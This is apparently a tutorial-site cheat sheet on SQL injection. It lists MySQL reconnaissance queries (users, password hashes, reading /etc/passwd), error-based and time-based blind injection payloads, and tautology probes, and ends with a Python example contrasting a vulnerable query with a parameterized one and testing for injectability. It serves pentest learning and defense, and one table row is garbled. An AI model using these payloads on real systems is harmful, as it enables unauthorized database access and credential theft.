SQL Injection Cheat Sheet
Last Updated: 07 Jun, 2023
SQL injection is a common vulnerability in web applications that lets an attacker inject malicious SQL code into the queries an application sends to its database. An attacker who knows the correct syntax for injecting SQL commands into an application's back end could use this to execute unauthorized or destructive actions on behalf of the target user. An ethical hacker should always test for and identify potential SQL injection vulnerabilities, as SQL injection is one of the most frequently used attacks in today's digital world.
The purpose of this cheat sheet is to provide quick, accurate, ready-to-use commands and the necessary sqlmap queries to help you with SQL injections.
Basics of SQL:
| S. No. | Parameters | SQL Queries/Examples |
|---|---|---|
| 1. | Version | `SELECT @@version;` |
| 2. | Comments | `/* */` or `#` |
| 3. | Current user | `SELECT user();` or `SELECT system_user()` |
| 4. | List users | `SELECT user FROM mysql.user;` |
| 5. | List password hashes | `SELECT host, user, password FROM mysql.user;` |
| 6. | Current Database | `SELECT database()` |
| 7. | List databases | `SELECT schema_name FROM information_schema.schemata;` or `SELECT distinct(db) FROM mysql.db` |
| 8. | List tables | `SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'` |
| 9. | List columns | `SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'` |
| 10. | Find Tables From Column Name | `SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';` |
| 11. | Time delay | `SELECT BENCHMARK(1000000,MD5('A'));` `SELECT SLEEP(5); # >= 5.0.12` |
| 12. | Local File Access | `UNION ALL SELECT LOAD_FILE('/etc/passwd')` |
| 13. | Hostname/IP Address | `SELECT @@hostname;` |
| 14. | Create user | `CREATE USER test1 IDENTIFIED BY 'pass1';` |
| 15. | Delete user Location of the db file | `SELECT @@datadir;` |
Basic Commands of SQLMap:
Manual Attacks on SQLMap:

| S. No. | Manual Attack Parameters | SQLMap Queries/Examples |
|---|---|---|
| 1. | Quick detect INTEGERS | `select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))` |
| 2. | Quick detect STRINGS | `'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'` |
| 3. | Clear SQL Test | `product.php?id=4`, `product.php?id=5-1`, `product.php?id=4 OR 1=1`, `product.php?id=-1 OR 17-7=10` |
| 4. | Blind SQL Injection | `SLEEP(25)--`, `SELECT BENCHMARK(1000000,MD5('A'));` |
| 5. | Real world sample | `ProductID=1 OR SLEEP(25)=0 LIMIT 1--`, `ProductID=1) OR SLEEP(25)=0 LIMIT 1--`, `ProductID=1' OR SLEEP(25)=0 LIMIT 1--`, `ProductID=1') OR SLEEP(25)=0 LIMIT 1--`, `ProductID=1)) OR SLEEP(25)=0 LIMIT 1--`, `ProductID=SELECT SLEEP(25)--` |
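
The "Clear SQL Test" probes in row 3 also work as a defender's regression check: an endpoint is injectable if `5-1` behaves like `4` or `OR 1=1` widens the result set. The following is an added example, not code from the original article; it uses Python's built-in sqlite3 in place of MySQL, and the `products` table, function names and sample rows are constructed for illustration.

```python
import sqlite3

# Constructed sample data standing in for the table behind product.php
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(3, "lamp"), (4, "desk"), (5, "chair")])
    return db

def lookup_vulnerable(db, raw_id):
    # BEFORE: the request parameter is pasted into the SQL text, so the
    # database parses it as SQL (arithmetic, OR clauses, ...).
    sql = "SELECT id FROM products WHERE id = " + raw_id
    return [r[0] for r in db.execute(sql)]

def lookup_hardened(db, raw_id):
    # AFTER: strict allow-list validation, then a bound parameter. The value
    # never becomes part of the SQL text.
    if not raw_id.isascii() or not raw_id.isdigit():
        return None  # reject: caller should answer 400 and log the attempt
    return [r[0] for r in db.execute(
        "SELECT id FROM products WHERE id = ?", (int(raw_id),))]

def is_injectable(lookup, db):
    # Row 3 as a regression check: flag the lookup if 5-1 is evaluated as
    # arithmetic, or if OR 1=1 returns more rows than the baseline id=4.
    baseline = lookup(db, "4")
    arithmetic = lookup(db, "5-1") == baseline
    tautology = len(lookup(db, "4 OR 1=1") or []) > len(baseline)
    return arithmetic or tautology

if __name__ == "__main__":
    db = make_db()
    for probe in ["4", "5-1", "4 OR 1=1", "-1 OR 17-7=10"]:
        print(f"{probe!r:18} vulnerable={lookup_vulnerable(db, probe)} "
              f"hardened={lookup_hardened(db, probe)}")
    print("vulnerable flagged:", is_injectable(lookup_vulnerable, db))
    print("hardened flagged:  ", is_injectable(lookup_hardened, db))
```

Running `is_injectable` against each data-access function in a test suite catches a regression from bound parameters back to string concatenation before it ships.
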
You can also learn more about SQL Injections from the article: How to use SQLMAP to test a website for SQL Injection vulnerability.